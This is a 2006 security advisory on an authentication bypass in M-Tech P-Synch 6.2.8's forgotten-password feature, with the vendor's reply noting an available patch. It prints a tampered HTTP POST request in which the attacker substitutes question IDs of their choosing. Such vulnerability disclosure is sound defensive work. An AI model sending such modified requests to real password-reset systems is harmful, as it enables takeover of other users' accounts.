Tried, Tested and Proven

Security Advisory 06 – 002 – Attacker may choose authentication questions in forgotton password mechanism

Vulnerable System:

M-Tech P-Synch Password Management Software

Version:

6.2.8

Other versions:

Unknown

Vulnerability discovery and development:

Portcullis Security Testing Services discovered this vulnerability.

Affected Systems:

The vulnerability was found and verified against a system running on a Windows 2000 platform.

Details:

We identified that the application fails to keep track of the questions it has asked the user who is trying to authenticate via the Forgotten Password mechanism.

By design, the application chooses 3 questions from a predetermined pool and presents them to the user seeking to reset their password. Successfully answering these will permit the user to change their password.

It was noted that, in addition to the application failing to check that the supplied POST request corresponds to the questions presented to the user, it was possible to supply three instances of the same question and answer pair. Assuming that the presented answer is correct, the application authenticates the user successfully.

Under normal circumstances, answering the 3 questions presented by the application results in a POST request similar to this:

POST /nph-psf.exe HTTP/1.1

Host: 192.168.1.1

Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: https://192.168.1.1/nph-psf.exe

Content-Type: application/x-www-form-urlencoded

Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=answer1&_QUES_0=QD-42ae7b35-02484&_VALUE_1=answer2&_QUES_1=QD-42ae7be7-02504&_VALUE_2=answer3&_QUES_2=QD-43301276-02068&SUBMIT-QA.x=45&SUBMIT-QA.y=8

The above POST parameters may be freely modified by the use of a HTTP

proxy, or by sending them as a GET request.

Of interest to the attacker are the _QUES_[012] and _VALUE_[012] parameters. Each question has a unique code associated with it, eg. QD-43301276-02068 corresponds to the question "What was the name of your

first line manager?". All of the codes are available to both authenticated and unauthenticated users by viewing the HTML source of any pages containing security questions.

eg. (Less than)INPUT type=hidden name="_QUES_2" value="QD-43301276-02068"(Greater than)

It is possible to modify the request such that the malicious user provides the answer to questions of her choosing. Upon submitting the POST, the application fails to check that the supplied answers correspond to those questions presented to the user.

eg:

POST /nph-psf.exe HTTP/1.1

Host: 192.168.1.1

Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.7) Gecko/20050420 Firefox/1.0.6

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: https://192.168.1.1/nph-psf.exe

Content-Type: application/x-www-form-urlencoded

Content-Length: 259

TRANSACTION=C_RESPONSE&SESSKEY=F3zP51t%3D%21qR%5CnvJl%3D%7E0N&LANG=en-us&CSS=docs%2Fen-us%2Fstyle.css&MODEXT=&_VALUE_0=2&_QUES_0=QD-42ae7b35-02484&_VALUE_1=1990&_QUES_1=QD-42ae7b65-01988&_VALUE_2=8&_QUES_2=QD-42ae7bc1-02504&SUBMIT-QA.x=45&SUBMIT-QA.y=8 
Impact:

A malicious internal user may be able to socially engineer the answers to a number of the application’s questions for a given user. Some of the questions in use in the tested implementation have answers that may easily be obtained by an attacker within the organisation, eg: “what is your shoe size?”, “What year did you leave school?”. If the malicious user is able to obtain the answers to a small number of these questions, she may be able to login as the target user and freely modify their password and other details.

Exploit:

None required

Vendor Status:

Notified via email 17 February 2006

Vendor Response:

This is a known issue with the initial release of P-Synch 6.2.8. It was resolved in a patch to 6.2.8 in June, 2005, and is not present in any subsequent versions of the product. All customers are entitled to the patch (and indeed to all minor and major version upgrades) at no cost. Normally customers are notified of issues such as this by their M-Tech account representative. Was this customer not notified? (M-Tech does not know who the customer in question is.). A compensating control that reduces but does not eliminate the severity of this issue is that most organizations use multiple question sets to authetnicate users, and the vulnerability in question reduces the strength of individual question sets, but does not eliminate the need to authenticate with more than one.

Copyright:

Copyright © Portcullis Computer Security Limited 2006, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information.
It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.